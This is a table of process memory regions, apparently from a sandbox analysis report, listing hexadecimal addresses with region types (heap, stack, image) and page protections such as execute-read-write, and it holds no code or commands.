||
7FF00102000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page read and write
|
||
394000
|
heap private
|
page read and write
|
||
298D000
|
unkown
|
page read and write
|
||
1A0000
|
heap private
|
page read and write
|
||
12EE0000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
507000
|
heap default
|
page read and write
|
||
2160000
|
heap private
|
page read and write
|
||
4F4000
|
heap default
|
page read and write
|
||
4B4000
|
heap private
|
page read and write
|
||
313000
|
heap default
|
page read and write
|
||
12DA1000
|
unkown
|
page read and write
|
||
256E000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2390000
|
unkown
|
page readonly
|
||
7FF00050000
|
unkown
|
page read and write
|
||
18D000
|
unkown
|
page read and write
|
||
657000
|
unkown
|
page read and write
|
||
17A000
|
stack
|
page read and write
|
||
1F67000
|
unkown
|
page readonly
|
||
120000
|
unkown
|
page readonly
|
||
35B5000
|
unkown
|
page read and write
|
||
90A000
|
heap default
|
page read and write
|
||
7FF001B0000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
1E67000
|
unkown
|
page readonly
|
||
24E000
|
heap default
|
page read and write
|
||
5D0000
|
heap default
|
page read and write
|
||
5D7000
|
heap default
|
page read and write
|
||
1F77000
|
unkown
|
page readonly
|
||
AC000
|
stack
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
35DE000
|
unkown
|
page read and write
|
||
8B7000
|
heap default
|
page read and write
|
||
2050000
|
unkown
|
page read and write
|
||
34E000
|
unkown
|
page read and write
|
||
2230000
|
unkown
|
page readonly
|
||
35E4000
|
unkown
|
page read and write
|
||
192000
|
unkown
|
page execute and read and write
|
||
BA000
|
stack
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1BCCE000
|
unkown
|
page read and write
|
||
35D1000
|
unkown
|
page read and write
|
||
4D7000
|
heap default
|
page read and write
|
||
287E000
|
stack
|
page read and write
|
||
2D00000
|
unkown
|
page write copy
|
||
100000
|
unkown
|
page read and write
|
||
4E0000
|
unkown
|
page readonly
|
||
C30000
|
heap private
|
page read and write
|
||
AC000
|
unkown
|
page read and write
|
||
2350000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
BA7000
|
unkown
|
page readonly
|
||
1B4C0000
|
unkown
|
page read and write
|
||
33E5000
|
unkown
|
page read and write
|
||
324D000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
2760000
|
unkown
|
page readonly
|
||
420000
|
unkown
|
page readonly
|
||
2C2000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
10022000
|
unkown
|
page execute and read and write
|
||
534000
|
heap private
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
27DE000
|
unkown
|
page read and write
|
||
208F000
|
unkown
|
page read and write
|
||
60D000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
2D9000
|
heap default
|
page read and write
|
||
7FF00290000
|
unkown
|
page read and write
|
||
358C000
|
unkown
|
page read and write
|
||
2AC000
|
stack
|
page read and write
|
||
450000
|
unkown
|
page read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
304000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
31F2000
|
unkown
|
page read and write
|
||
274D000
|
unkown
|
page read and write
|
||
1B55D000
|
unkown
|
page read and write
|
||
2A80000
|
heap private
|
page execute and read and write
|
||
5F4000
|
heap default
|
page read and write
|
||
49E000
|
stack
|
page read and write
|
||
643000
|
unkown
|
page read and write
|
||
2DA000
|
heap default
|
page read and write
|
||
260000
|
heap default
|
page read and write
|
||
514000
|
heap default
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
12C91000
|
unkown
|
page read and write
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
150000
|
unkown
|
page execute and read and write
|
||
6DE000
|
stack
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
1CD4000
|
heap private
|
page read and write
|
||
2DCE000
|
unkown
|
page read and write
|
||
3E7000
|
heap default
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
1B360000
|
unkown
|
page read and write
|
||
2D4E000
|
unkown
|
page read and write
|
||
3B0000
|
heap private
|
page read and write
|
||
29A000
|
stack
|
page read and write
|
||
890000
|
heap default
|
page read and write
|
||
630000
|
unkown
|
page readonly
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1CD7000
|
unkown
|
page readonly
|
||
296F000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
604000
|
heap default
|
page read and write
|
||
12F42000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2520000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
1D2000
|
unkown
|
page execute and read and write
|
||
287000
|
heap default
|
page read and write
|
||
460000
|
heap private
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
3C0A000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
2A30000
|
unkown
|
page readonly
|
||
1B980000
|
unkown
|
page readonly
|
||
330000
|
unkown
|
page readonly
|
||
8FD000
|
heap default
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
382000
|
unkown
|
page read and write
|
||
430000
|
heap default
|
page read and write
|
||
5C4000
|
heap default
|
page read and write
|
||
3A0000
|
unkown
|
page execute and read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
338000
|
heap default
|
page read and write
|
||
2340000
|
unkown
|
page read and write
|
||
4B0000
|
heap private
|
page read and write
|
||
284000
|
heap default
|
page read and write
|
||
1B4CA000
|
unkown
|
page read and write
|
||
311000
|
heap default
|
page read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
212000
|
unkown
|
page execute and read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
1C860000
|
heap private
|
page read and write
|
||
59D000
|
heap default
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
1DB000
|
unkown
|
page read and write
|
||
73C000
|
unkown
|
page read and write
|
||
1AC000
|
unkown
|
page read and write
|
||
2160000
|
heap private
|
page read and write
|
||
417000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page readonly
|
||
380000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
3D0000
|
unkown
|
page readonly
|
||
4D2000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1B0000
|
heap private
|
page read and write
|
||
22AE000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
3080000
|
unkown
|
page readonly
|
||
610000
|
heap private
|
page read and write
|
||
4F0000
|
heap default
|
page read and write
|
||
3E0000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
2BC000
|
stack
|
page read and write
|
||
2340000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
10020000
|
unkown
|
page execute and read and write
|
||
27FD000
|
unkown
|
page read and write
|
||
2DDE000
|
unkown
|
page read and write
|
||
1CD0000
|
heap private
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
3517000
|
unkown
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
2DEE000
|
unkown
|
page read and write
|
||
1B95A000
|
unkown
|
page read and write
|
||
1B3EE000
|
unkown
|
page read and write
|
||
262000
|
unkown
|
page execute and read and write
|
||
36B2000
|
unkown
|
page read and write
|
||
2CCE000
|
unkown
|
page read and write
|
||
E20000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
657000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
64B000
|
unkown
|
page read and write
|
||
18C000
|
unkown
|
page read and write
|
||
1E2000
|
unkown
|
page execute and read and write
|
||
2A90000
|
heap private
|
page read and write
|
||
3BE6000
|
unkown
|
page read and write
|
||
1B6000
|
unkown
|
page read and write
|
||
29D000
|
heap default
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
4B0000
|
heap private
|
page read and write
|
||
1C80000
|
unkown
|
page readonly
|
||
286E000
|
stack
|
page read and write
|
||
655000
|
unkown
|
page read and write
|
||
5E7000
|
heap default
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
C00000
|
unkown
|
page write copy
|
||
2400000
|
unkown
|
page readonly
|
||
35B8000
|
unkown
|
page read and write
|
||
2260000
|
heap private
|
page read and write
|
||
BC0000
|
heap private
|
page read and write
|
||
3B0000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
2740000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
222000
|
unkown
|
page execute and read and write
|
||
2880000
|
unkown
|
page readonly
|
||
1CE0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
358F000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
D0000
|
unkown
|
page readonly
|
||
267000
|
heap default
|
page read and write
|
||
334000
|
heap default
|
page read and write
|
||
404000
|
heap default
|
page read and write
|
||
31CD000
|
unkown
|
page read and write
|
||
186000
|
unkown
|
page read and write
|
||
4F7000
|
heap default
|
page read and write
|
||
2CBC000
|
unkown
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
2FB0000
|
heap private
|
page read and write
|
||
320F000
|
unkown
|
page read and write
|
||
617000
|
heap default
|
page read and write
|
||
2470000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
68E000
|
unkown
|
page read and write
|
||
560000
|
heap default
|
page read and write
|
||
28A0000
|
unkown
|
page readonly
|
||
3D6000
|
unkown
|
page read and write
|
||
510000
|
unkown
|
page readonly
|
||
2AC0000
|
unkown
|
page read and write
|
||
2E8000
|
heap default
|
page read and write
|
||
1C9AE000
|
unkown
|
page read and write
|
||
3AD000
|
stack
|
page read and write
|
||
68B000
|
unkown
|
page read and write
|
||
232000
|
unkown
|
page execute and read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
630000
|
heap default
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
150000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
3B2000
|
heap private
|
page read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
584000
|
heap default
|
page read and write
|
||
28A7000
|
unkown
|
page readonly
|
||
2B8000
|
heap private
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
26E0000
|
heap private
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
35B2000
|
unkown
|
page read and write
|
||
2350000
|
heap private
|
page read and write
|
||
564000
|
heap private
|
page read and write
|
||
2030000
|
unkown
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
278E000
|
unkown
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
4EF000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
10022000
|
unkown
|
page execute and read and write
|
||
5E0000
|
heap private
|
page read and write
|
||
68A000
|
unkown
|
page read and write
|
||
212000
|
unkown
|
page execute and read and write
|
||
430000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
23B0000
|
unkown
|
page readonly
|
||
1EC0000
|
unkown
|
page write copy
|
||
3206000
|
unkown
|
page read and write
|
||
C80000
|
heap private
|
page read and write
|
||
2B0000
|
heap private
|
page read and write
|
||
5DE000
|
heap default
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
90000
|
unkown
|
page readonly
|
||
7FF001D0000
|
unkown
|
page read and write
|
||
1CB40000
|
heap private
|
page read and write
|
||
29A000
|
stack
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
443000
|
heap default
|
page read and write
|
||
22B0000
|
unkown
|
page write copy
|
||
880000
|
heap default
|
page read and write
|
||
2510000
|
unkown
|
page readonly
|
||
1C00000
|
unkown
|
page readonly
|
||
2BFC000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7FF00210000
|
unkown
|
page read and write
|
||
657000
|
unkown
|
page read and write
|
||
28AC000
|
unkown
|
page read and write
|
||
2B0000
|
heap default
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1B9B0000
|
unkown
|
page read and write
|
||
18C000
|
unkown
|
page read and write
|
||
20CD000
|
stack
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
7FF001A0000
|
unkown
|
page execute and read and write
|
||
B80000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
1B9B0000
|
unkown
|
page read and write
|
||
8B4000
|
heap default
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1BA7E000
|
unkown
|
page read and write
|
||
2C00000
|
heap private
|
page read and write
|
||
7FF00220000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
35E1000
|
unkown
|
page read and write
|
||
30B000
|
heap default
|
page read and write
|
||
190000
|
heap default
|
page read and write
|
||
2300000
|
heap private
|
page read and write
|
||
45F000
|
stack
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
468000
|
heap private
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
27CD000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
607000
|
heap default
|
page read and write
|
||
86E000
|
unkown
|
page read and write
|
||
12CBC000
|
unkown
|
page read and write
|
||
1CA0000
|
unkown
|
page read and write
|
||
1B954000
|
unkown
|
page read and write
|
||
1F0000
|
heap private
|
page read and write
|
||
2D0000
|
heap default
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
669000
|
unkown
|
page read and write
|
||
923000
|
heap default
|
page read and write
|
||
CB000
|
unkown
|
page read and write
|
||
490000
|
heap default
|
page read and write
|
||
1D80000
|
unkown
|
page readonly
|
||
570000
|
unkown
|
page readonly
|
||
23B000
|
unkown
|
page read and write
|
||
3C38000
|
unkown
|
page read and write
|
||
2C8E000
|
unkown
|
page read and write | page guard
|
||
2277000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
8A4000
|
heap default
|
page read and write
|
||
284000
|
heap default
|
page read and write
|
||
376000
|
unkown
|
page read and write
|
||
2160000
|
heap private
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
3490000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
520000
|
heap default
|
page read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
2C5C000
|
unkown
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
29ED000
|
unkown
|
page read and write
|
||
B8F000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
27D0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
8E4000
|
heap default
|
page read and write
|
||
690000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
364B000
|
unkown
|
page read and write
|
||
2BE000
|
heap default
|
page read and write
|
||
4CD000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3D0000
|
unkown
|
page readonly
|
||
28EE000
|
unkown
|
page read and write
|
||
82F000
|
stack
|
page read and write
|
||
25FE000
|
unkown
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
210000
|
unkown
|
page execute and read and write
|
||
2BBE000
|
stack
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
690000
|
unkown
|
page readonly
|
||
4A0000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
870000
|
unkown
|
page readonly
|
||
530000
|
heap private
|
page read and write
|
||
B00000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2220000
|
heap private
|
page read and write
|
||
2C0000
|
heap private
|
page read and write
|
||
2CD0000
|
unkown
|
page write copy
|
||
64C000
|
unkown
|
page read and write
|
||
527000
|
heap default
|
page read and write
|
||
2970000
|
unkown
|
page write copy
|
||
2720000
|
unkown
|
page readonly
|
||
1A0000
|
heap private
|
page read and write
|
||
4F0000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
28AC000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
25C000
|
stack
|
page read and write
|
||
7A0000
|
heap private
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
234D000
|
stack
|
page read and write
|
||
26E4000
|
heap private
|
page read and write
|
||
2D2E000
|
unkown
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
2030000
|
unkown
|
page readonly
|
||
5E0000
|
unkown
|
page readonly
|
||
2A4A000
|
heap private
|
page execute and read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
25E0000
|
unkown
|
page read and write
|
||
90000
|
heap default
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
2A3E000
|
unkown
|
page read and write
|
||
12C95000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
1CB53000
|
heap private
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
300000
|
heap default
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
690000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
3A0000
|
unkown
|
page read and write
|
||
500000
|
unkown
|
page readonly
|
||
6F0000
|
unkown
|
page readonly
|
||
7FF00115000
|
unkown
|
page read and write
|
||
2CF000
|
stack
|
page read and write
|
||
2E0000
|
heap private
|
page read and write
|
||
1B460000
|
unkown
|
page readonly
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
2582000
|
heap private
|
page read and write
|
||
480000
|
heap private
|
page read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
2CC6000
|
unkown
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
8F7000
|
heap default
|
page read and write
|
||
52D000
|
heap default
|
page read and write
|
||
24AF000
|
unkown
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
7FF00142000
|
unkown
|
page execute and read and write
|
||
2D4E000
|
unkown
|
page read and write
|
||
4DD000
|
heap default
|
page read and write
|
||
207F000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page execute and read and write
|
||
685000
|
unkown
|
page read and write
|
||
1B850000
|
unkown
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
21E0000
|
unkown
|
page readonly
|
||
50D000
|
heap default
|
page read and write
|
||
3ADA000
|
unkown
|
page read and write
|
||
1AC000
|
stack
|
page read and write
|
||
359F000
|
unkown
|
page read and write
|
||
15B000
|
unkown
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
4A7000
|
heap default
|
page read and write
|
||
7FF00240000
|
unkown
|
page read and write
|
||
25B000
|
unkown
|
page read and write
|
||
1BAA0000
|
heap private
|
page read and write
|
||
2C91000
|
unkown
|
page read and write
|
||
300000
|
heap default
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
22B000
|
unkown
|
page read and write
|
||
916000
|
heap default
|
page read and write
|
||
680000
|
unkown
|
page readonly
|
||
6F0000
|
unkown
|
page readonly
|
||
460000
|
unkown
|
page readonly
|
||
35BB000
|
unkown
|
page read and write
|
||
2E8000
|
heap private
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
2170000
|
unkown
|
page readonly
|
||
2380000
|
unkown
|
page readonly
|
||
1AF0000
|
unkown
|
page readonly
|
||
210000
|
unkown
|
page execute and read and write
|
||
8C7000
|
heap default
|
page read and write
|
||
1F30000
|
heap private
|
page read and write
|
||
9C0000
|
unkown
|
page readonly
|
||
2230000
|
unkown
|
page readonly
|
||
540000
|
heap default
|
page read and write
|
||
1CC0000
|
unkown
|
page readonly
|
||
2E0000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1D16000
|
unkown
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page execute and read and write
|
||
8E0000
|
heap default
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
6DE000
|
stack
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
1F70000
|
unkown
|
page readonly
|
||
280000
|
unkown
|
page readonly
|
||
8F6000
|
heap default
|
page read and write
|
||
2BF0000
|
unkown
|
page readonly
|
||
220000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page readonly
|
||
3E0000
|
heap default
|
page read and write
|
||
2CF4000
|
unkown
|
page read and write
|
||
4C4000
|
heap default
|
page read and write
|
||
360000
|
heap private
|
page read and write
|
||
24B0000
|
unkown
|
page readonly
|
||
10020000
|
unkown
|
page execute and read and write
|
||
26CE000
|
unkown
|
page read and write
|
||
2C1E000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1D90000
|
unkown
|
page readonly
|
||
2130000
|
unkown
|
page readonly
|
||
597000
|
heap default
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
2DE000
|
heap default
|
page read and write
|
||
2C90000
|
unkown
|
page readonly
|
||
4D4000
|
heap private
|
page read and write
|
||
400000
|
heap default
|
page read and write
|
||
340000
|
unkown
|
page read and write
|
||
33DB000
|
unkown
|
page read and write
|
||
30D000
|
heap default
|
page read and write
|
||
2120000
|
heap private
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
530000
|
heap private
|
page read and write
|
||
5B0000
|
heap default
|
page read and write
|
||
2C8E000
|
unkown
|
page read and write
|
||
2C04000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
2C6D000
|
stack
|
page read and write
|
||
1D9F000
|
unkown
|
page read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
6BE000
|
stack
|
page read and write
|
||
28CB000
|
unkown
|
page readonly
|
||
646000
|
unkown
|
page read and write
|
||
219B000
|
heap private
|
page read and write
|
||
2EE000
|
stack
|
page read and write
|
||
2610000
|
unkown
|
page readonly
|
||
3040000
|
heap private
|
page read and write
|
||
267000
|
heap default
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
2217000
|
unkown
|
page readonly
|
||
2500000
|
unkown
|
page readonly
|
||
29D000
|
heap default
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
4D7000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
260000
|
heap default
|
page read and write
|
||
2B0000
|
heap default
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
21FE000
|
stack
|
page read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
1BC2D000
|
unkown
|
page read and write
|
||
7FF0004A000
|
unkown
|
page execute and read and write
|
||
14B000
|
unkown
|
page read and write
|
||
31B000
|
heap default
|
page read and write
|
||
3F4000
|
heap default
|
page read and write
|
||
660000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
2652000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
400000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
278E000
|
unkown
|
page read and write
|
||
35A2000
|
unkown
|
page read and write
|
||
28F0000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
18C000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
7FF00100000
|
unkown
|
page read and write
|
||
329000
|
heap default
|
page read and write
|
||
1C9F000
|
unkown
|
page read and write
|
||
35C8000
|
unkown
|
page read and write
|
||
78E000
|
unkown
|
page read and write
|
||
200000
|
heap private
|
page read and write
|
||
5E0000
|
heap default
|
page read and write
|
||
170000
|
heap private
|
page read and write
|
||
C88000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
27C000
|
stack
|
page read and write
|
||
567000
|
heap default
|
page read and write
|
||
640000
|
unkown
|
page readonly
|
||
1FB0000
|
unkown
|
page read and write
|
||
2FC000
|
heap default
|
page read and write
|
||
8C0000
|
heap default
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2AE000
|
unkown
|
page read and write
|
||
7FF002C0000
|
unkown
|
page execute and read and write
|
||
560000
|
heap private
|
page read and write
|
||
3268000
|
unkown
|
page read and write
|
||
936000
|
heap default
|
page read and write
|
||
26FF000
|
stack
|
page read and write
|
||
4F4000
|
heap private
|
page read and write
|
||
61D000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
7FF00110000
|
unkown
|
page read and write
|
||
2DBF000
|
stack
|
page read and write
|
||
3B0000
|
unkown
|
page readonly
|
||
210000
|
unkown
|
page readonly
|
||
2E50000
|
heap private
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
52E000
|
unkown
|
page read and write
|
||
CC000
|
unkown
|
page read and write
|
||
364F000
|
unkown
|
page read and write
|
||
188000
|
heap private
|
page read and write
|
||
3554000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2564000
|
heap private
|
page read and write
|
||
7FF0011A000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
2F0000
|
unkown
|
page readonly
|
||
1E10000
|
unkown
|
page readonly
|
||
7FF00230000
|
unkown
|
page execute and read and write
|
||
320000
|
unkown
|
page readonly
|
||
35CE000
|
unkown
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
7FF00217000
|
unkown
|
page read and write
|
||
1EF0000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
4D0000
|
heap private
|
page read and write
|
||
654000
|
unkown
|
page read and write
|
||
300000
|
heap default
|
page read and write
|
||
255C000
|
unkown
|
page read and write
|
||
2C8F000
|
unkown
|
page read and write
|
||
2066000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1B409000
|
unkown
|
page read and write
|
||
FA0000
|
heap private
|
page read and write
|
||
2870000
|
unkown
|
page readonly
|
||
10022000
|
unkown
|
page execute and read and write
|
||
1B950000
|
unkown
|
page read and write
|
||
2560000
|
heap private
|
page read and write
|
||
8C7000
|
heap default
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
2094000
|
unkown
|
page read and write
|
||
2650000
|
unkown
|
page read and write
|
||
2417000
|
unkown
|
page readonly
|
||
1E10000
|
unkown
|
page readonly
|
||
8BD000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
35CB000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page execute and read and write
|
||
3592000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
297000
|
heap default
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page read and write
|
||
2170000
|
unkown
|
page readonly
|
||
2630000
|
heap private
|
page read and write
|
||
41D000
|
heap default
|
page read and write
|
||
280000
|
heap default
|
page read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
190000
|
unkown
|
page execute and read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
20000
|
heap private
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page readonly
|
||
1B5000
|
unkown
|
page read and write | page guard
|
||
10000000
|
unkown image
|
page readonly
|
||
320000
|
unkown
|
page readonly
|
||
2D0E000
|
stack
|
page read and write
|
||
2C07000
|
heap private
|
page read and write
|
||
1EF0000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
12E01000
|
unkown
|
page read and write
|
||
1F30000
|
heap private
|
page execute and read and write
|
||
10020000
|
unkown
|
page execute and read and write
